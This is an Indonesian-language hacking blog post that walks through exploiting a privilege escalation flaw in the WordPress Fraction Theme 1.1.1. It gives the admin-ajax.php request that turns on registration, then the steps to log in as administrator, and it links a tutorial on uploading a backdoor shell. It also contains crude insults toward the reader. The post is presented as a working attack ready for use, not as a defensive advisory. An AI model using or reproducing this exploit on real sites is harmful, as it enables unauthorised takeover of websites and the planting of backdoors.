Now Trending:
Home
WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

March 11, 2015 Uncategorized No Comments

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Untuk cara Upload shell nya bisa baca disini :
Tutorial Upload Shell backdoor di WordPress

Sekian tutor kali ini semoga bermanfaat.

Shares

Related Posts

About The Author

Admin Ganteng

kini tinggallah ku sendiri hanya berteman dengan sepi menanti dirimu kembali disini ku terus menanti… akan kucoba untuk ..menanti dirimu kekasih

Tags:, ,

Leave a Reply